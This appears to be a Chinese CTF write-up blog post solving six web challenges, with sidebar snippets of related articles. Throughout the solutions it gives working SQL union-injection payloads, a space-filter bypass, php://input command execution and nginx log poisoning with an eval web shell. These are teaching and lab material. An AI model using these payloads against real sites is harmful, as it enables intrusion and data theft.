ZTJL3

最新推荐文章于 2025-12-24 21:03:51 发布
原创 最新推荐文章于 2025-12-24 21:03:51 发布 · 85 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

本文围绕Web安全展开,介绍了SQL注入和文件包含漏洞的利用方法。通过万能密码尝试、联合查询获取数据库信息,如库名、表名、列名和数据;利用文件包含漏洞,借助php://input执行系统命令读取文件,还涉及绕过空格过滤等操作,以获取关键信息。

web1

源代码base64解码就是答案

web2

登录框,万能密码试一下

admin or 1=1#      密码随便输,条件是恒成立的,但是这个页面没有回应

admin' or 1=1#     加上单引号就页面就有了新的变化。

应该是单引号字符型注入

 顺序为:获取库名,获取表名,获取列名,获取数据

获取注入点,运用联合查询

admin' or 1=1 union select 1,2,3#

 从这里我们知道该数据库有三列,并且注入点是第二列

admin' or 1=1 union select 1,2,3,4#  页面不会有变化

库名

admin' or 1=1 union select 1,database(),3#

库名就是web2了

表名

admin' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#

table_name是查询表名需要的命令和schema_name查询库名的用法相同。tables是从information_schema库的tables表中获取,后面的where table_schema='web2'是table表中获取web2的表的内容。也就是做了一定的限制,就只获取web2库中的表名。flag 和user

就要获得列

admin' or union select 1,group_concat(column_name),3 from information_schema.columns  where table_schema='web2' and table_name='flag'#

column_name就是查询列名的意思

 可以看到flag表中有一个flag列。

内容获取

admin' or 1=1 union select 1,flag, 3 from flag#

 web3

找到include,应该是文件包含漏洞,抓包看看

 php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。

加上系统命令,读取文件    <?php system('ls')?>

 接着读取,看到结果了。

 web4

打开页面和上面一题是一样的,照着操作一下,出现报错

 但是根据返回包知道是nginx:

默认nginx日志是:/var/log/nginx/access.log,可以看到记录了请求

包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录,包括HTTP请求行,Referer,User-Agent等HTTP请求的信息

 

传参: 

 ?url=/var/log/nginx/access.log

#这个地址是存放日志文件的,可以进行文件注入一句话

Burp Suite抓包,在User-Agent后面写个🐎

<?php eval($_POST['a'])?>

 蚁剑连接,看到flag

web5

 发现要求v1必须是字符串,v2必须是数字,并且对v1和v2的md5弱相等,也就是==,只比较字符串开头是否相等,那么就需要找到两个md5开头相等的即可。

QNKCDZO的md5是0e830400451993494058024219903391

240610708的md5是0e462097431906509019562988736854

 web6

尝试一下简单的万密,但是没有什么发现,应该是出现过滤了

 先绕过空格,/**/代替空格,可以,说明过滤了空格。

和web2差不多

注入点在2

admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#

 

 admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#

得到数据库名为web2

 查表

admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#

 查询flag表的字段

admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#

 

查看flag字段中的内容

admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#

 这题和web2差不多,只是过滤了空格,在每条查询语句加上/**/绕过空格就可以了。

aspose.words -> word文档内容动态编辑
不想懂得Zenith
10-16 1766
一. 导入maven依赖 1. 获取aspose-word-18.6-jdk16.jar; 2. 导入本地仓库; mvn install:install-file -DgroupId=com.aspose -DartifactId=aspose-words -Dversion=18.8 -Dpackaging=jar -Dfile=D:/aspose-words-18.6-jdk16.jar 3. pom文件中引入坐标. <dependency> <groupI..
Java毕业设计_旅行社业务及客户服务系统设计与实现
bishe_teacher的博客
06-19 471
旅行社业务及客户服务系统设计与实现 旅行社业务及客户服务系统设计与实现mysql数据库创建语句 旅行社业务及客户服务系统设计与实现oracle数据库创建语句 旅行社业务及客户服务系统设计与实现sqlserver数据库创建语句 旅行社业务及客户服务系统设计与实现spring+springMVC+hibernate框架对象(javaBean,pojo)设计 旅行社业务及客户服务系统设计与实现spring+springMVC+mybatis框架对象(javaBean,pojo)设计 高质量编程视频:sahngye
ZTJL2
qq_75005708的博客
10-05 141
抓包看看使用本地,抓包后修改就可以了,再次访问新的地址就可以了后面第二种使用脚本就可以了。
ZTJL4
qq_75005708的博客
10-08 198
下载下来并没有什么发现,应该爆破压缩包,用AAPR不行,ziperello也不可以查了之后才是需要修复文件,用zipcenop修复了之后就可以了。密码也就不用了。前提是我们需要把压缩包和jar文件放在同一个目录下,cmd命令进入到当前目录下就可以了这个工具也就是修复zip伪加密文件,修复成功之后就不需要密码了。然后java -jar ZipCenOp.jar r lm.zip(lm.zip为需要处理的文件)出现下面这个页面就说明文件修复成功了。
ZTJL1
qq_75005708的博客
10-05 362
查看PHP回到页面访问php,访问结果如下前面还比较好理解给出用户名和密码,但是后面就出现一个函数,我们应该要绕过它,接着往下看一下,它需要admin=admin,然后就passwd=wllm,如果可以满足这个条件,就可以拿到flag了,现在关键的问题就是我们要绕过函数。__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行程序调用反序列化方法时,会自动执行__weakup()函数payloads:4:"wllm";
查杀我这辈子有幸遇到的第一个Linux病毒 (by quqi99)
技术并艺术着
08-17 2474
作者:张华 发表于:2021-08-17 版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本版权声明 问题 本人有一个腾讯虚机,昨天忽然ssh不上去了,控制台重启之后就又上去了,所以也就过去了。 可是今天又遇到了同样情况,不能总重启啊,得好好研究一下怎么回事了。 关闭云镜 使用top命令看到有个叫什么YunJing的进程,搜索一番后通过下列命令删除。 sudo /usr/local/qcloud/stargate/admin/uninstall.sh sudo /usr/loca
linux系统中挖矿病毒
杭州吉网-运维日记
01-13 808
原创作者:运维工程师 谢晋 linux系统中挖矿病毒错误信息解决问题 错误信息 客户这边说某台虚拟机CPU突然暴增,用完了整个宿主机CPU资源 可以看到CPU使用确实很高 登录系统查看CPU使用情况 使用top查看CPU使用情况 # top 可以看到kdevtmpfsi进程,该进程明显是挖矿病毒进程 解决问题 如果直接kill掉kdevtmpfsi程序后续还会反复运行,所以要一次停掉他相关进程 打印出所有进程 # ps aux 可以看到kdevtmpfsi进程和他的守护进程kinsi
记一次linux杀病毒过程
SunChao3555的博客
06-08 381
接收到信息化部门同事说环境机检测到挖矿软件、勒索软件、内网主机与恶意地址、域名与URL通信。1.查看与恶意网址通讯的ip以及相应进程。3.进入到进程所在目录并删除文件。2.找到进程启动所在目录。
博易大师指标公式文华财经软件指标公式期货指标公式大全
2401_88513784的博客
10-31 487
ZT:=C>REF(C,1)*1.095; ZTT:=BARSLAST(ZT); HH:=HHV(H,ZTT+1)/REF(H,ZTT); LL:=REF(L,ZTT)/LLV(L,ZTT+1); A1:=REF(HH,1)<1.07 AND REF(LL,1)<1.07; A2:=BETWEEN(REF(ZTT,1),5,15); A3:=C/REF(C,1)>1.05 AND H/C<1.02 AND REF(C,1)<REF(REF(C,ZTT),1) AND C>REF(REF(C,ZTT),1);
Linux Unix.Trojan.Elknot (Linux.BackDoor.Gates.5)木马清理
热门推荐
liukeforever的专栏
08-14 1万+
被黑后, 向外疯狂发包,造成网络瘫痪
Fall back to translate ‘用户中心‘ key with ‘zh‘ locale.
Ama_Lee的博客
07-12 4603
一般情况下是没有定义’xxxx’字段对应的翻译还有一种问题是你定义了此字段以及对应的所有语言,'XXXX’已经是你要翻译成的文字,这种情况出现的原因大概率是在不同的地方翻译了两次,也就是调用了两次$t(‘xxxx’)进行语言转换。...
渗透入门之SQL 注入(1)
最新发布
lightningyang的博客
12-24 490
本文介绍了SQL注入实验的合法测试环境要求及操作流程。实验只能在授权环境下进行,严禁非法测试。文章详细说明了bwapp测试环境的搭建步骤,包括系统配置、安全级别设置等。重点分析了GET请求搜索类SQL注入的6个实验步骤:从判断注入点类型、确定查询字段数,到获取数据库信息、表名、列名,最终提取账号密码数据并验证。实验通过构造特定URL实现信息提取,展示了SQL注入的核心原理和操作流程,同时强调了合法测试的重要性。
SQL SERVER——生成sql:删除所有log表中,user_name是某用户的数据
前方一片光明
12-23 252
SQL SERVER——生成sql:删除所有log表中,user_name是某用户的数据
【Spring】BeanPostProcessor详解
瘦到被风吹走的博客
12-23 568
BeanPostProcessor 核心摘要 BeanPostProcessor 是 Spring 核心扩展点,允许在 Bean 初始化前后插入自定义逻辑。它在两个关键节点介入:初始化前(postProcessBeforeInitialization)和初始化后(postProcessAfterInitialization)。主要特性包括:可返回代理对象(AOP实现基础)、影响所有Bean、决定Bean最终形态。 Spring内置多个关键实现类,如处理@Autowired的AutowiredAnnotati
loader命令导出大批量数据维护SQL
一瓢西湖水的博客
12-23 222
工作学习中,经常遇到几千,甚至上万条的数据维护任务,如果一条一条进行数据维护SQL的编写,将是巨大的工作量。本文将分享2个小技巧,减小准备大批量数据维护SQL的工作量。MySQL 中字符串用两个单引号 ‘’ 转义,而不是反斜杠。
SQL 诊断准确率 99.99%,天翼云基于 Apache Doris MCP 的 AI 智能运维实践
SelectDB
12-24 531
Apache Doris 上的应用规模庞大,已在生产环境中落地超 30 个项目,覆盖广泛的业务场景,展现出大规模、多类型场景并行运行的特征。
开源项目 SQLBot Dockerfile、docker-compose.yaml、Dockerfile-base 三个文件直接的关系
nbspzs的专栏
12-24 738
SQLBot采用"三层套娃"架构实现高效开发:1)Dockerfile-base构建基础环境层,包含系统依赖和Python包;2)Dockerfile应用层基于基础镜像快速拷贝业务代码;3)docker-compose编排运行层实现容器连接。这种设计分离了环境构建(低频)和代码部署(高频),大幅提升构建效率。开发时应利用docker-compose的volumes挂载实现实时修改,避免频繁重建镜像。GitHub Actions自动化流程区分基础镜像和业务镜像构建,确保发布效率。关键要区分
数据库】PostgreSQL中JSONB的使用与踩坑记录
weixin_63434398的博客
12-20 1139
PostgreSQL JSONB使用摘要
mybatis-plus插件解决sql报错:this is incompatible with sql_mode=only_full_group_by ”
吉他程序员的博客
12-23 191
解决的办法可以改sql,也可以改sql服务的conf配置, 但是如果你项目用的是mybatis-plus插件 , 就可以用我介绍的很简单的方法。是 MySQL 的严格模式要求,确保 GROUP BY 查询的语义明确。这个错误是 MySQL 5.7+ 版本中最常见的兼容性问题之一。SELECT 列表中的列不在 GROUP BY 子句中。MySQL 无法确定从分组中的哪行返回这些列的值。且这些列也不是聚合函数的参数。然后重启项目就可以了。
PostgreSQL高可用集群部署与配置指南
虽非技冠群英首,愿与同道共长歌; 大鹏一日同风起,扶摇直上九万里;
12-23 656
PostgreSQL高可用集群部署与配置指南
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值